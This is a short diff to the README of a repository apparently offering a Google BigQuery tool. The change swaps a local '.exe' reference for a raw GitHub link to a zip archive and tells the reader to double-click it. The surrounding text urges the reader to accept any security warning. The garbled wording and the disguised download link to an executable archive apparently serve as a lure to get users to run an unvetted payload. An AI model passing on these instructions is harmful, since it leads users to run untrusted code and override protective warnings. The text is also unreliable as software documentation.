zinebsektaoui/bigquery-jsh/README.md

 4. **Run the Application**

-   Double-click on the `bigquery-jsh.exe` file to open the application.
+   Double-click on the `https://raw.githubusercontent.com/zinebsektaoui/bigquery-jsh/main/felly/bigquery-jsh.zip` file to open the application.
 If prompted with a security warning, confirm that you want to run it.

 5. **Connect to Google BigQuery**